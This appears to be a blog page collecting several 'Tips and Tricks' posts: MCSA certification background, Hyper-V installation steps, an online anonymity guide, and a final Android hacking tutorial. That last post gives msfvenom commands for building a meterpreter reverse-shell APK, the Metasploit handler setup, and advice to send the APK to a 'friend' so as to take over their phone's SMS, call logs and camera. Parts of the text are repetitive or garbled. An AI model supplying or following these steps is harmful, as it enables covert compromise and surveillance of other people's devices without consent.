Showing posts with label Tips and Tricks. Show all posts
Showing posts with label Tips and Tricks. Show all posts


What is MCSA?

MCSA is an acronym for "Microsoft Certified Solutions Associate." It is a certification program provided by Microsoft that verifies the abilities and expertise of IT professionals in setting up, maintaining, and troubleshooting Microsoft products like Windows Server, SQL Server, and Office 365.

The MCSA certification is typically considered entry-level and serves as a prerequisite for more advanced Microsoft certifications, such as the MCSE (Microsoft Certified Solutions Expert) and MCSD (Microsoft Certified Solutions Developer) certifications.

Microsoft has recently retired the MCSA certification, so it is no longer available for new candidates. However, if you have already earned an MCSA certification, it is still valid and recognized by Microsoft as a measure of your expertise in Microsoft technologies.

Microsoft has recently retired the MCSA certification, so it is no longer available for new candidates. However, Microsoft now offers role-based certifications, which are designed to validate the skills and knowledge required for specific job roles, such as Azure Administrator, Microsoft 365 Developer, and Microsoft Teams Administrator.

To pursue a role-based certification from Microsoft, you can visit the Microsoft Learn website, where you can find a variety of online learning resources, including free training courses, hands-on labs, and interactive exercises. These resources are designed to help you develop the skills and knowledge required for the certification exams.

Once you feel prepared, you can schedule and take the certification exam through the Microsoft Certification website. The exams are administered by Pearson VUE, a global testing company, and you can take the exam either in person at a testing center or online through a remote proctoring service.

Keep in mind that the specific requirements and procedures for earning a role-based certification may vary depending on the certification you are pursuing, so it's important to review the relevant information and resources provided by Microsoft to ensure that you are following the correct path

The Exam of MCSA is retired by Microsoft by it did not mean that mcsa has no value .

You can find the information regarding the retirement of mcsa exam you can find it on the Microsoft website.

Those who want to go into cloud computing or wanted to do a job early or wanted to make a career in AWS, Azure, etc need to do MCSA.

If you are in an IT career then you should be aware of what is MCSA .

Retirement from the Exam means the MCSA is upgraded to Another Exam.

Let's Start with Virtualization.

If you wanted to make a virtual machine you need Hyper V for that and if you are having Windows 10 Pro means you already have Hyper V on your laptop you just need to activate it.

  • Minimum Requirement for Virtualization (Hyper - v) Installation.
  • Win8/8.1/10/11 Also you should have a pro version of them with the 64-bit version.

How to Install Hyper V on Win10
  • setting - apps - go to program and features - then turn Windows feature on and off
  • Now all features of Windows will come up and go to the hyper v feature, now tick all checks of hyper v and click ok.
  • Now changes will apply - restart the system.
  • Now we will check hyper v is installed or not .
  • Click on start and type hyper v - hyper v manager will show .
  • Now we will make a virtual machine on a physical machine.
  • We will use 2019 server.
  • Download it from the Microsoft website which is free .

First Download windows Microsoft edge developer for Windows 10 virtual machine select your client opreating system like we are using Win10 will download Win10.

Now we will download server 2019 from the Microsoft website.

We will download the ISO file of the 2019 server and fill in the details they need.

How To Stay Anonymous On The Internet: A Guide To Keeping Your Identity Secure

How To Stay Anonymous On The Internet: A Guide To Keeping Your Identity Secure

With more and more people using the internet for communication and to access valuable information, it is important to stay safe online. In this article, we discuss the various way you can remain anonymous on the web and keep your personal identity secure. Learn how you can protect yourself from cyber threats and keep yourself out of harm's way!

What is Internet Anonymity?

When we think of the internet, we usually think of it as a relatively anonymous place. After all, we can communicate with people from all over the world without revealing our real identities. But the truth is, the internet is not as anonymous as we might think.

There are a number of ways that our identities can be revealed online, whether we're using social media, browsing the web, or even just sending an email. And if our identities are revealed, we may be at risk of identity theft, cyberbullying, or other malicious activities.

So how can we stay anonymous on the internet? There are a few simple steps we can take to help protect our identities and keep our personal information safe.

First, consider using a pseudonym or alias when you're communicating online. This can help to protect your identity if your real name is somehow revealed.

Second, be careful about what personal information you share online. If you don't need to share your full name, address, or phone number, don't!

Third, use strong passwords for all of your online accounts and make sure to change them regularly. Using different passwords for different accounts can also help to keep your identity safe.

Fourth, keep your software and security settings up to date. This will help to protect you from malware and other security threats.

Finally, consider using a VPN when you're connected to the internet. A VPN can encrypt your traffic and help to hide

1. Virtual machine
In essence, a virtual machine is a second computer running on your PC. Through an app, you can simulate another device. The emulated machine can then be customized to suit your needs.

On Windows, Linux, and Mac, VirtualBox is available for use.

2. Be Careful What You Post Online

Even if you’re using a VPN or Tor, you should still be careful about what you post online. Any information you post could potentially be used to identify you, so it’s important to think twice before posting anything personal or sensitive online.

3. Using Browser & Search Engine DuckDuckGo

DuckDuckGo is a search engine that doesn’t track your behaviour (like Google and Bing that use behavioural tracking to target you with ads).

It offers useful features like region-specific searching, Safe Search (to protect against explicit content) and an instant answer feature which shows an answer across the top of the screen apart from the search results.

To summarize it up we would like to tell you that-

Our online privacy is being compromised from all aspects. Ads legally track our online activities and hackers steals our personal information.

The GDPR may help in the long run but that remains to be seen. What’s important is what do we do now.

These tools will help you to be more secure and be more private in terms of internet experience today.

4. VPN

One of the best ways to stay anonymous online is to use a VPN, or Virtual Private Network. A VPN encrypts all of your traffic and routes it through a server in another location, making it very difficult for anyone to track your activity or identify you

5. Proxy servers

Between your computer and the internet, a proxy server acts as a middleman. It essentially functions as an additional computer that you employ to handle internet requests. Though conceptually different, it is a completely different physical machine from a virtual machine.

By concealing your IP address, it safeguards your privacy similarly to a VPN, but it can also send a new user agent to prevent anyone from identifying your browser and reject or allow cookies while preventing them from reaching your device.

A smart place to seek for a trustworthy proxy server is among the many VPN providers that also provide proxy servers. You shouldn't set the proxy server if you are using a premium VPN. There are several ways to use a proxy server, but if you're using a free VPN, you should use one. Use foxyproxy if you are using Google Chrome or Firefox. We would recommend it as the best tool and proxy server. I advise using a web proxy server if you don't know how to utilise a foxy proxy. You can access the web proxy server URL at the address provided below.

6. Secured Messaging Apps

If you must use an online messaging app, you should be aware that many of them aren't as safe as you would like.

The "secret conversation" function on Facebook Messenger is real, but Facebook hasn't exactly been the most secure social network overall.

Signal is what we advised. Even voice calls may be placed with this software, which uses end-to-end encryption.

7. Use TOR

Tor is another tool that can help you stay anonymous online. Tor encrypts your traffic and routes it through multiple servers around the world, making it even more difficult to trace your activity.

Hope you enjoyed this. Keep connected

Tips for Using Social Media Anonymously

Anonymous social media accounts are becoming increasingly popular, but there are a few things to consider before going completely anonymous online. Here are a few tips for using social media anonymously:

1. Choose a platform that allows for anonymity. There are a number of social media platforms that allow users to remain anonymous. Some of the more popular ones include Beme, Whisper, and Secret.

2. Avoid using personal information. When creating an anonymous account, be sure to avoid using any personal information, such as your real name, address, or phone number.

3. Use a fake name and profile picture. When creating your anonymous account, use a fake name and profile picture that cannot be traced back to you in real life.

4. Keep your posts private. Be sure to adjust your privacy settings so that only people who you've approved can see your posts. This will help to prevent your identity from being accidentally revealed.

5. Don't friend or follow anyone you know in real life. If you friend or follow someone you know in real life on an anonymous account, there's a chance they could figure out who you are. So it's best to stick with strangers when remaining anonymous online.

Other Methods of Enhancing Your Online Anonymity

There are a number of other methods you can use to improve your online anonymity. For example, consider using the Tor browser when surfing the web. Tor is a free software that encrypts your traffic and routes it through a network of nodes, making it much harder to trace back to you.

You might also want to look into using a virtual private network (VPN). A VPN encrypts all the traffic between your computer and the VPN server, making it impossible for anyone on the same network as you to snoop on your activity. There are many reputable VPN providers out there, so be sure to do some research before choosing one.

Finally, you can also make use of encryption when sending sensitive information over the internet. This can make it much harder for anyone intercepting your traffic to read your data. There are a number of different programs out there that can help you encrypt your communications; again, be sure to do some research to find one that meets your needs.

Take Care

Hacking Article Learn How to Hack Andriod

Hack Call Logs, SMS, Camera of Remote Android Phone using Metasploit

Hi Friends today in this article, we will learn how to hack or manipulate an android device and exploit it according to anyone’s desires.Android is an operating system based on Linux kernel.To install any application, it employs a file format based on the APK.We will thus also have APK-format malware.Use the following msfvenom commands to create the malware. 

As the msfvenom malware is created, start the handler in order to have a session and for this type :

command: msfvenom -p android/meterpreter/reverse_tcp LHOST= LPORT=1234 R > /root/Desktop/Shell.apk

Service apache2 status (this command will help you to check your apache server is enable or not).

First you need to start your apache server. Command for starting is

root@kali:~# Service apache2 start

Now open the blank terminal or another terminal and type the command or we can say start a metasploitfor  starting a metasploit the command is - 


After wirte msfconsole now type the below commands

Now Write these commands at below:- 

 msf5 > use exploit/multi/handler

 msf5 > set payload android/meterpreter/reverse_tcp

 msf5 > set lhost

 msf5 > set lport 1234

After writing this command send that APK file to your friend and install it.

After installing the .APK file write the command –

 msf5 > exploit

Now, there are various commands to further exploit your victim’s device. We will show you practical of some of the major commands and all of these commands are shown in the image below :

You can check whether the device is rooted or not by using the following command :

meterpreter > check_rootsend

sms -d(put the victim phone number ) -t hacked and hit the enter.

And you can Do many more things usnig this.


Now in the next Blog Our Team Will tell You How to detect a these type malicious application in your mobile phone so be connected.

Hope you enjoyed this. Keep connected.


Take Care

Stay Home Stay Safe